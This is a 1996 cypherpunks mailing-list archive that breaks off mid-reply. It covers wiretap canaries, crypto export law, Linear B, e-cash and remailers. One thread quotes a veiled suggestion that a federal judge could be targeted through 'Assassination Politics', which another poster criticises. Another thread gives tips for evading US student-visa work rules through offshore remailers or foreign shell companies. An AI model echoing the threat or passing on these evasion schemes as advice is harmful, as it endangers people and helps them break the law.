>Jim Bell is absolutely correct that laws like this are offensive and outrageous.
>Unfortunately, Jim then rants at Unicorn for suggesting that this
>would be the case; you'd think he'd be the first to realize that
>there are laws out there that are offensive and outrageous and enforced.

I really don't think you're giving me enough credit.  I am fully aware that 
in the past, the organizations on which wire-tap-type subpoenas were served 
(primarily AT+T, "The phone company") were very cooperative with the police 
and probably "never" challenged the subpoena. There is the law, and there is 
the usual reaction to that law, and I expect that much of Unicorn's position 
is based on a (false) assumption that this reaction will necessarily 
continue unchanged.

Besides, that phone company had a monopoly, so it wasn't possible for 
citizens to shop around for a phoneco that was known to make it hard for 
police.  But that's changing, and that's my point.  Now and in the future, 
it's going to be harder and harder for the police to get a 
bend-over-backwards level of cooperation, and in fact phonecos (and 
especially ISP's) might reasonably want to build up a reputation that they 
will defend a customer's security in court long before a wiretap is 
installed.  Imaginative phonecos will find ways to inform the target 
legally, including naming the target as a non-hostile defendant in a court 
challenge to that wiretap, and noticing that target since he's now a party 
to a court action that must be noticed under civil procedure rules.

In short, there is a drastic difference between blind obeisance and 
enthusiastic hostility, even if you exclude actions by the ISP or phoneco 
that would rise to the level of some crime.  It is this difference which 
will  change the previous ability of the police to get wiretaps 
done secretly.  My point in the first paragraph that I am quoted in above is 
that many of the challenges that have never been made against wiretap 
subpoenas, due to a closer-than-arms-length relationship between the phoneco 
and the government, _will_ be challenged.  Precedent, to the extent 
precedent exists, will be challenged on (among other things) the basis of 
the fact that this precedent was formulated during an era when essentially 
all telecommunications was monopolized and regulated, and there is no reason 
to believe that a previous telecom monopoly would have been diligent at 
protecting the rights of their captive customers against the interest of the 
government at that time.


>>For example, if I ask my ISP to send me an anonymous, encrypted message with 
>>the word, "Rosebud" in it to me if he receives any requests to tap my 
>>connection, he can do so with no fear of being discovered, because no third 
>>party can decrypt the message, know who is is from, or know the real meaning 
>>of the word, "Rosebud" in the context of an encrypted, anonymized message.  
>>Further, since the whole thing is by pre-arrangement, even I cannot prove 
>>(to the satisfaction of a third party) that the message really meant what I 
>>would interpret it to mean.  The message is useful to me, as a warning, but 
>>it could never turn around and "bite" the ISP.
>
>Now that's an interesting wrinkle to the problem.  I suspect that,
>as you suggest, there will be ISPs, especially in non-US jurisdictions,
>that are willing to send out "Rosebud" messages to anonymous remailers,
>or to fail to send "Remarque" messages, or to debit anonymous accounts
>for data retrieval services rendered while also supporting billing-status
>checking by anonymous remailers.  From a crypto-anarchist dogmatic perspective,
>it'll definitely happen, though there may be a rough transition until
>there's enough critical mass to make it undetectable (and note that
>"undetectable" is a tougher standard than "untraceable"...)

I think we need to start challenging all the previously-assumed issues that 
have been interpretated to benefit the government.  If my ISP has agreed, 
for instance, to send me daily certifications that he hasn't received any 
"official" inquiries about my account, and one day he receives such an 
inquiry and is forced to install some sort of a tap, it is hard for me to 
imagine what kind of legal precedent would allow (and, even, REQUIRE) him to 
continue to send false certifications when the alternative, simply failing 
to send any certifications whatever, is also "legal."  (and, in fact, may be 
required under my contract with him, should he be obligated to do a tap or 
know one exists.)  The fact that I'd likely interpret his failure to send those 
messages as meaning that my access is tapped is not within his control, and 
if he's unwilling to screw me I find it hard to believe that he can't act on 
this fact even if those actions have an indirect effect of alerting me.  
These are the kinds of issues that have either rarely or never been 
challenged in court, simply because the organization(s) that would normally 
do those challenges was in the hip pocket of government.  It's going to be a 
brave new world very soon.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Fri, 5 Apr 1996 07:18:09 +0800
To: mccoy@communities.com
Subject: Re: Navajo code-talkers
Message-ID: <9604041824.AA1177@smtp1.chipcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Linear B is Minoan, and knowing Greek helps in understanding what things
>decipher to, but it predates the Greek alphabet by several centuries so
>even if you knew Homer personally you would have had trouble reading it.

Well, I know the writing system is different, and knowing the greek 
alphabet is no help at all, but that in itself is of no significance.  What is
of significance is that the syllabic writing system forces the words into
somewhat peculiar forms (exactly as in Japanese transliterations of
English words).  Furthermore the language is several centuries older
than Homer, so you have to deal with assorted archaisms.  Then again,
if you know even a little of ancient greek linguistics, it gets easier.
My greek is all high school level and yet I can figure out some of
the Minoan stuff.

>ObCrypto:  Unlike Egyptian hieroglyphics, we have yet to find a Rosetta
>Stone equivalent for Linear B (or Linear A, it's predecessor, although I
>seem to remember Linear A being more akin to ideograms)  Most of what is
>known about Linear B was inferred using a sort of linguistic cryptanalysis,
>in fact there was a paper in one of the Crypto proceedings from the mid-80s
>which described some of the methods employed.

There's a book on the subject: Chadwick, "The decypherment of
Linear B".  Neat.  The particularly fascinating part about it is that
no Rosetta stone was needed -- and indeed if one were found now
it would merely serve to confirm the decypherment, not really to add
anything to it.

Linear A looks a whole lot like Linear B but as far as I know has not
yet been decyphered and is believed to be a completely different
language (I think the guess is some Semitic language but absent
a decypherment that remains speculation).  I don't think it is any more
ideographic.  There is a third writing system from the same area
that has a hieroglyphic look to it (pictures) and is also undecyphered
as far as I know.  I think Chadwick has details, if not look in the
recently published "The world's writing systems" by Daniels & Bright, 
Oxford U. Press, 1995, ISBN 0-19-507993-0.  Great book!

>ObMoreDeadLanguages: Does anyone know if there are Unicode character sets
>for Sanskrit or hieroglyphics?  How exactly does one get a proposed
>character set approved/ratified if not?

Well, Sanskrit is usually written with Devanagiri, same as Hindi, so that's
all covered.  If you want to write it with Siddham characters, there are
proposals for that but I don't think they have gone all that far.  I have
also seen discussions about hieroglyphics, again not beyond the
proposal stage as far as I can recall.

Talk to Rick McGowan (Rick_McGowan  @ NeXT.Com), he's the
driving force behind efforts to put all the obscure, obsolete, and
archaic scripts into Unicode.  I know he has a proposal for
Linear B, complete with encodings of each character...

 paul

!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "Be wary of strong drink.  It can make you shoot at tax collectors
!  -- and miss!"
!                -- Robert A. Heinlein, "The Notebooks of Lazarus Long"
!                   in "Time Enough for Love"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Melman <melman@osf.org>
Date: Fri, 5 Apr 1996 08:26:48 +0800
To: cypherpunks@toad.com
Subject: Re: software with "hooks" for crypto
In-Reply-To: <2.2.32.19960403145406.0034a4d4@labg30>
Message-ID: <9604041614.AA04108@absolut.osf.org.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



On Wed Apr 3, 1996, John Deters wrote:

> At 02:31 PM 4/2/96 -0800, you wrote:
> >Hello all,
> >
> >I'm trying to figure out exactly what the laws are regarding the export of
> >software which contains "hooks" for PGP.  In various forms, I've heard
> >that it's not the ITAR which prevents this, but more a "suggestion" by
> >the NSA that we "shouldn't do it."  Does anyone have any pointers to
> >real legislation/laws regarding this?
> 
> There are a number of "PGP Helpers" (If this is Tuesday, it must be PGP) out
> there.  These are other PGP front end applications such as Private Idaho,
> PGPShell and others that do NOT include PGP, nor do they contain any
> encryption code within them.  These applications are all billed as "freely
> exportable".  If your software does not contain any encryption code, such
> that it simply "invokes" the users separately-obtained-and-installed copy of
> PGP, you are not in violation of ITAR.  It sounds like this is what you're
> doing with your "hooks for PGP".

I am not a lawyer.

Hooks to encryption code have *sometimes* been considered
"ancillary devices" and as such are in violation of ITAR.

Calling another executable like pgp *might* be less of an
issue than having source code hooks that call crypto library
routines, but maybe not.  (And no I don't understand why
they would be different)

NCSA had something related to this in their use of PEM/PGP
in httpd.  See some info at:  

  http://hoohoo.ncsa.uiuc.edu/docs/PEMPGP.html

which says:

  Note: As of NCSA HTTPd 1.4.1, support for PEM/PGP encryption
  was removed in order to bring NCSA in compliance with the
  Internation Treaty on Arms Reduction to which the United
  States of America is a signatory. We hope to have an
  improved version available with NCSA HTTPd 1.5 from an
  export controlled server.

In sum, check with a lawyer.

Howard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 5 Apr 1996 12:51:04 +0800
To: cypherpunks@toad.com
Subject: .sig followup
Message-ID: <199604041930.LAA24745@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:52 PM 4/4/96 +0200, Ulf Moeller quotes:
>"In some ways the online environment in 1996 feels like Hong Kong in the
>last days of British rule: a very free community wondering what's going to
>happen as the forces of law and order start moving in."  --  Charles Platt

A better analogy would be free, peaceful, self governing Denmark waiting
for the jack booted Nazi thugs to arrive and start hauling people off to
jail.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 5 Apr 1996 08:24:36 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: New essay
Message-ID: <Pine.SUN.3.91.960404113134.9576A-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Not that it will say much you haven't heard before, but I have an
essay on "The Internet as a Source of Regulatory Arbitrage" available at

http://www.law.miami.edu/~froomkin/arbitr.htm

It's an attempt to be less "legal".  Only 93 footnotes!

[The above may have been dictated with Dragon Dictate/Win 2.0 voice 
recognition. Be alert for unintentional strange word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpps@voicenet.com
Date: Fri, 5 Apr 1996 10:31:48 +0800
To: cypherpunks@toad.com
Subject: pgp keys
Message-ID: <199604041655.LAA01570@laura.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there a reliable method for obtaining the pgp public key for an
arbitrary email address? elm-2.4pl24pgp3 does a logical join on my local
alias and keyring files; what I'm looking for is a way for my mua/mta to
obtain keys I do not have.

I've caught some of the discussion on key servers, and noted some
people's use of their signature, plan, or home page to distribute their
keys.  Are some combination of these suitable today? Is there a
parseable convention in use for extracting keys from mail/finger/html?
Is there a "get_keyd" floating about?

My goal is to make encryption the default behavior on outgoing mail. I
am not concerned about local security.

Thanks in advance.

jps
-- 
Jack P. Starrantino   jpps@voicenet.com   http://www.voicenet.com/~jpps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 5 Apr 1996 16:21:37 +0800
To: cypherpunks@toad.com
Subject: Re: the "unsubscrive" meme keeps on going.
Message-ID: <ad8954b61102100499ab@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:28 PM 4/4/96, bryce@digicash.com wrote:
>> unsubscrive * Peter.Posch@koeln.netsurf.de
>
>
>I suspect that this meme propagates (especially among
>non-native-English-speakers) via the list itself.  Peter
>Posch probably saw one of the previous "unsubscrives" and is
>hoping it will work for him.  Perhaps the
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

A good insight. Reminds me of the "cargo cults."

(If you don't know the story, here's a brief version: Pacific Islanders saw
Americans bringing riches and technological gew-gaws to their islands in
WWII. Then they left, leaving cargo crates and whatnot behind. The
Islanders believed if they fashioned radio headsets out of coconuts and
radios out of old logs that they could bring the Great Birds from the Sky
back. (*) This has since gotten currency--through anthropologists, Ayn
Rand, Richard Feynman, and others--as a short-hand description for people
engaging in magical thinking that the _trappings_ of something will
sympathetically bring on the real thing. Some might say Java is a cargo
cult...hmmmhhh, Java is a Pacific island....hmmmhhh.)

(* Note: In this age of hypersensitivity, sometimes called political
correctness, there are likely to be lurkers who suddenly jump up at this
characterization of "native peoples" and decry my characterization of them
as "savages" (even though I have not used this word nor this attitude
toward them). And some will claim that if more American learned Bahasa
Indonesia there would not be this cultural imperialism that is repressing
all people of color. Hey, I don't repress no coloreds!)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 5 Apr 1996 13:09:15 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: [NOISE] Re: Fascinating troll with forged newgroups
In-Reply-To: <qo4uLD107w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.92.960404120337.12296A-100000@elaine28.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My apologies for intruding in CDApunks/Bilingualpunks/CableTVpunks/INSpunks.

On Thu, 4 Apr 1996, Dr. Dimitri Vulis wrote:

> If your co-dependents had forged tale's digital signatures, then this
> would be teresting. But tale doesn't use digital signatures. Therefore

He should.

> forging him is thing new, nothing fascinating, has no cryptographic
> relevance, and probably edn't be reported to the cypherpunks mailing
> list. I'm sure there are many ee-speech advocates on this list who find
> your attempts to silence the Nazis ven _more distasteful then the Nazis'
> messages of hatred.

My attempts to silence the Nazis? That's a new one.

So is the soc.culture.russian.moderated script freely available yet? I'd
like to use a stripped-down version thereof (controlling crossposts only)
for the talk.politics.natl-socialism that Milton Kleim and I proposed a
week ago.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWQuDI3DXUbM57SdAQEoaQP+JsSl9ZLA4ojZCfV49tC35/mB8YuGnOJJ
UkTX2VSEOlZQr3KtoI7c8+H0yFJm4eWdFDoxQcjnxSIjt0tn7W2r/ZfIRdaGjcF6
7x22rPMvJ5SQfvr979G1oGHt5ntP0hWuqi2DVlq1Pp3c/GhmEly6JJOVnulnW1yE
VuKmV5JZ7J4=
=KYL5
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 5 Apr 1996 17:00:37 +0800
To: cypherpunks@toad.com
Subject: Re: .sig followup
In-Reply-To: <199604041930.LAA24745@netcom9.netcom.com>
Message-ID: <Pine.SUN.3.92.960404122403.12946A-100000@elaine28.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Apr 1996, Bill Frantz wrote:

> At  2:52 PM 4/4/96 +0200, Ulf Moeller quotes:
> >"In some ways the online environment in 1996 feels like Hong Kong in the
> >last days of British rule: a very free community wondering what's going to
> >happen as the forces of law and order start moving in."  --  Charles Platt
>
> A better analogy would be free, peaceful, self governing Denmark waiting
> for the jack booted Nazi thugs to arrive and start hauling people off to
> jail.

There's no question about the thugs *arriving*. They're already here.
Fighting them is an internal political battle, not an external battle. Yes
they're clueless about the net, so in that sense you might see the
CDAmeisters as an "invasion," but I really don't buy this stuff about
Cyberspace (a word only Barlow can say with a straight face) being a new
"place." It's just a communications medium, no more and no less real than
anything else. I think it would be better to stress that the online *is*
real life. Your money and gigs of information about you is online. It can
be a force for freedom, or a force for totalitarianism. Right now, the
momentum is entirely in the wrong direction, both online and in "real
life."

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter N. Posch" <Peter.Posch@koeln.netsurf.de>
Date: Thu, 4 Apr 1996 23:05:47 +0800
To: cypherpunks@toad.com
Subject: unsubscrive * Peter.Posch@koeln.netsurf.de
Message-ID: <3163B992.132A@koeln.netsurf.de>
MIME-Version: 1.0
Content-Type: text/plain


unsubscrive * Peter.Posch@koeln.netsurf.de




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 5 Apr 1996 12:15:04 +0800
To: cypherpunks@toad.com
Subject: Re: e$ Signorage
Message-ID: <v02120d00ad89c2c2811b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:35 AM 4/4/96, James Gleick (!) wrote:

> Seigniorage is actually the Government's interest income on all the
>currency in circulation. It's not obvious, but it's true, that the Fed
>collects the "float" on dollar bills you carry in your pocket, exactly as
>American Express collects the float on traveler's checks.

Ah. That makes much more sense. I've always wanted to know what to call the
interest  an ecash issuer made on the e$ he had out on the net. "None Dare
Call it Seigniorage." Sounds like a 50's movie title...

> And, I don't know, call me crazy, but $20 billion sounds like a lot of
>money to me.

I bet that's a real number. In terms of its scale in the overall Federal
Universe, to paraphrase Dirksen, "a billion here, a billion there..."

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Eden <erice@internic.net>
Date: Fri, 5 Apr 1996 11:46:24 +0800
To: cypherpunks@toad.com
Subject: Using crypt()
Message-ID: <199604041747.MAA11669@ops.internic.net>
MIME-Version: 1.0
Content-Type: text/plain



I'm testing a encryption program that includes use of crypt().  
(I know its not the strongest scheme.)  Here's the problem:

We ask users to e-mail us an encrypted password derived form the
crypt() utility when they set up an account.  When they want to
change information related to the account, we ask them to e-mail the
cleartext of the encrypted password.  The program then checks to see
if the cleartext matches the original encrypted password. If so, their
information is automatically updated.

The only problem is when users mistakenly supply cleartext initially,
they can never update their information because the program isn't
smart enough to realize that the user was submitting cleartext instead
of an encrypted password when setting up their account.

Is there any way to check and see if the text the user 
supplies initially has been encrypted or is cleartext?

Or is there a better way to do this?

The account does not contain financial information, otherwise a
stronger scheme would be required.  Right now the program allows the
user to choose from the auth schemes MAIL-FROM, CYPT-PW or PGP.

Any hints would be appreciated.

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Fri, 5 Apr 1996 13:12:21 +0800
To: coderpunks@toad.com
Subject: Fwd: Anonymous code name allocated.
Message-ID: <960404135136_264041269@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


[The following has been censored to protect the guilty.]

>Subj:	Anonymous code name allocated.
>Date:	96-04-02 23:37:10 EST
>From:	daemon@anon.penet.fi (System Daemon)
>To:	jonwienke@aol.com
>
>You have sent a message using the anon.penet.fi anonymous forwarding
service.
>You have been allocated the code name anXXXXXX.
>You can be reached anonymously using the address
>anXXXXXX@anon.penet.fi.
>
>If you want to use a nickname, please send a message to
>nick@anon.penet.fi, with a Subject: field containing your nickname.
>
>For instructions, send a message to help@anon.penet.fi.

I tried sending a test message to the address indicated, and received it back
a day later, so sending email to this address does reach me.  The funny part
is that I have never (to my knowledge) had any communication with
anon.penet.fi prior to receiving this email.  

Questions:
1. How do I use this to SEND messages anonymously?  Having an email address
with no obvious link to my identity is cool, but I would like to be able to
send as well as receive.  I sent email to help@anon.penet.fi, but have
received no response yet.

2. Why was I chosen for this?  How did anon.penet.fi find out my email
address?  Is the NSA trying to lull me into a false sense of security in the
hope that I will use this account to violate ITAR?

3. Has anyone else on this list received unsolicited remailer accounts?

Jonathan Wienke
---------------------
Forwarded message:
From:	daemon@anon.penet.fi (System Daemon)
To:	jonwienke@aol.com
Date: 96-04-02 23:37:10 EST

You have sent a message using the anon.penet.fi anonymous forwarding service.
You have been allocated the code name an573530.
You can be reached anonymously using the address
an573530@anon.penet.fi.

If you want to use a nickname, please send a message to
nick@anon.penet.fi, with a Subject: field containing your nickname.

For instructions, send a message to help@anon.penet.fi.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Fri, 5 Apr 1996 12:26:28 +0800
To: cypherpunks@toad.com
Subject: Re: unsubscrive * Peter.Posch@koeln.netsurf.de
In-Reply-To: <3163B992.132A@koeln.netsurf.de>
Message-ID: <Pine.SCO.3.91.960404142543.16990A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Apr 1996, Peter N. Posch wrote:

> unsubscrive * Peter.Posch@koeln.netsurf.de

Why don't we just patch Majordomo to recognize "unsubscrive", 
"unsuscribe", "unscribe," and "take me off this fucking list" as all being 
equal to "unsubscribe"?

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: in5y113@public.uni-hamburg.de (Ulf Moeller)
Date: Fri, 5 Apr 1996 02:50:05 +0800
To: cypherpunks@toad.com
Subject: Re: Digest Version???????
Message-ID: <9604041252.AA45126@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:

> www.hks.net and nntp.hks.net let you read the Cypherpunks and Coderpunks
> mailing lists with the Web and Newsreader programs (except when they're
> down for repairs.)  The Web version is typically half a month behind
> because it gets summarized and hypertextified monthly, though I suspect
> the articles are there and it's just the index that's old.

There is another hypermail archive at http://infinity.nus.sg/cypherpunks/
and an unmoderated digest from majordomo@abc.gateway.com
(subscribe cypherpunks-d).

--
"In some ways the online environment in 1996 feels like Hong Kong in the
last days of British rule: a very free community wondering what's going to
happen as the forces of law and order start moving in."  --  Charles Platt

Ulf Möller   *   E-Mail: <um@c2.org>   *   WWW: http://www.c2.org/~um/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Fri, 5 Apr 1996 04:01:36 +0800
To: "Peter N. Posch" <Peter.Posch@koeln.netsurf.de>
Subject: the "unsubscrive" meme keeps on going... Re: unsubscrive * Peter.Posch@koeln.netsurf.de
In-Reply-To: <3163B992.132A@koeln.netsurf.de>
Message-ID: <199604041328.PAA17335@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



> unsubscrive * Peter.Posch@koeln.netsurf.de


I suspect that this meme propagates (especially among
non-native-English-speakers) via the list itself.  Peter
Posch probably saw one of the previous "unsubscrives" and is
hoping it will work for him.  Perhaps the 
owner-cypherpunks@toad.com people could hack it to bounce
"unsubscrives" (along with the other spellings) back to
sender with an explanation?


Regards,

Bryce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kreidl@newrock.com
Date: Fri, 5 Apr 1996 14:25:59 +0800
To: cypherpunks@toad.com
Subject: Why pay???
Message-ID: <199604042142.PAA24182@Ultra1.corenet.net>
MIME-Version: 1.0
Content-Type: text/plain



>
>Thanks for your interest in Cypherpunks Lite.
>
>I provide a moderated version of the Cypherpunks list called
>"Cypherpunks Lite".  A one year subscription costs US$20 and is
>payable by check or money order to "Communication Security Corp".
>Cypherpunks Lite is available in either individual messages or a
>more-or-less daily message digest.  The content of both are the same.
>In either case, I forward approximately 5 - 10% of the total
>Cypherpunks feed.  This works out to about 5 - 10 messages / day.
>
>To take a look at what you can expect there is an archive of the previous
>selections organized by month at ftp://ftp.crl.com/users/co/comsec/cp-lite.
>The files with the extension .gz are compressed using gzip.
>
>If you would like to subscribe, please send payment to:
>
>	Communication Security Corp.
>	1275 Fourth Street, Suite 194
>	Santa Rosa, CA 95404 USA
>
>Be sure to provide the email address you want us to use, as well as
>indicating your preference for individual messages or the digest.
>
Why would I pay if I can get it for free this way??????

	

ÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑ
Chris (or Richard) Kreidl Ñ
kreidl@newrock.com        Ñ
ÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑ








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 5 Apr 1996 15:41:16 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Employers need pseudonymous off-shore remailers
In-Reply-To: <v02120d4ead7e45b17945@[192.0.2.1]>
Message-ID: <4k1nfk$4rt@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02120d4ead7e45b17945@[192.0.2.1]>,
Lucky Green <shamrock@netcom.com> wrote:
>Today, I tried to find out what it takes to hire someone who is in the US
>on a student visa (F-1) as a consultant or part-time employee. The person
>is an expert in his field. I don't know anyone available with a similar
>proven track record.
>
>I thought, no problem, there are INS exceptions for foreign experts. So I
>set on a quest to find out what it takes to get the INS to grant that
>person a work permit.
>
>The process is simple. All I have to do is ask the California Employment
>Development Department for a labor certificate, give that to the INS
>together with an application and the required fees, after which they'll
>issue the permit.
>
>Getting the certificate takes usually eight months, processing the
>application about four months. So the whole process takes about *a year*. I
>was stunned. Here I am willing to hire someone to work on a product that
>will generate taxes in the US, and the bureaucrats are asking me to wait a
>year. These people have lost any touch with reality.
>
>Not that *I* would do such a thing, but an off-shore pseudonymous remailer,
>with payment in ecash might go a long way...
>
>[Disclaimer: Speaking only for myself, not for my employer]
>
Having recently been involved in a similar situation :-), I found that
the following trick seems to work:  have someone you know start a consulting
company in another country (like Canada (yes, Canada is another country)).
It seems an F-1 student (like me (for now; I'm trying to switch to J-1))
is allowed to work for a foreign company (as if the US government could prevent
a foreign company from hiring a foreign citizen (well, it could try...
(these nested parens are getting out of hand...))).  So just contract work
out to a foreign consulting company, which subcontracts work out to
the F-1 student.

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Fri, 5 Apr 1996 16:51:26 +0800
To: cypherpunks@toad.com
Subject: time/date hash
Message-ID: <199604050027.QAA01957@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


Interesting note in current issue of PC Magazine about how DOS 4 and later generates volume ID numbers. Neil Rubenking describes a time/date hash of the form:
  month plus seconds
  day plus hundredths of seconds
  high byte of the year plus hours
  low byte of the year plus minutes

I've actually been thinking about such a time/date hash during idle brain cycles.  Any thoughts on how secure such a hash is, as in how collision proof if the input date is from today forward 50 years?

thanks,


Jerry Whiting
72627.746@compuserve.com  <- til our server is back up...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 5 Apr 1996 16:20:35 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
In-Reply-To: <199604040402.AA10457@mail.crl.com>
Message-ID: <4k1ql2$4vh@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


And here's another data point I learned at CFP.

<HEARSAY>
Kawika Daguio (Federal Representative, Regulatory & Trust Affairs, American
Bankers Association) mentioned that the Stamp Payments Act (or something
like that) forbids "open" currencies in amounts less than $1.  It seems
certain casinos have been hit with this, when other businesses in the
area started accepting their chips as "real" money.
It seemed to me that he thought that ecash (Digicash's version) wouldn't
fly in the US.
</HEARSAY>

We'll see, I guess...

   - Ian "Now where's the code for that library...?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 5 Apr 1996 15:35:39 +0800
To: tcmay@got.net
Subject: Re: Bad news from Judge Richey
Message-ID: <01I35I2AXN1C8ZE6BJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@got.net (Timothy C. May)
>At 3:28 AM 3/26/96, jim bell wrote:

>>I realize that this may appear to be a rather disrespectful tactic, but have
>>you considered reminding the judge that if you are not allowed to profit by
>>exporting encryption that the government doesn't want to see exported,
>>you'll just have to make money in some other way, and this may lead you to
>>talk to Jim Bell about implementing a program using encryption that doesn't
>>_need_ to be exported...legally anyway.

>Whoahh! Hold on there, Jimbo! You're crossing the line.

>You're coming perilously close to actually calling for the killing of a
>federal judge. My recollection is that a couple of folks have been arrested
>and charged for calling for the killing of judges.

	Umm... one would guess that a federal judge would be against the
whole Assasination Politics idea, whether or not he himself became a target.
I doubt that pointing AP out would do any good... but one can point out to a
judge that, say, a mugger might mug him next without being threatening.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 5 Apr 1996 15:08:39 +0800
To: cypherpunks@toad.com
Subject: Re: Using crypt()
In-Reply-To: <199604041747.MAA11669@ops.internic.net>
Message-ID: <Pine.LNX.3.92.960404174853.4227B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 4 Apr 1996, Eric Eden wrote:

> I'm testing a encryption program that includes use of crypt().
> (I know its not the strongest scheme.)  Here's the problem:
>
> We ask users to e-mail us an encrypted password derived form the
> crypt() utility when they set up an account.  When they want to
> change information related to the account, we ask them to e-mail the
> cleartext of the encrypted password.  The program then checks to see
> if the cleartext matches the original encrypted password. If so, their
> information is automatically updated.
>
> The only problem is when users mistakenly supply cleartext initially,
> they can never update their information because the program isn't
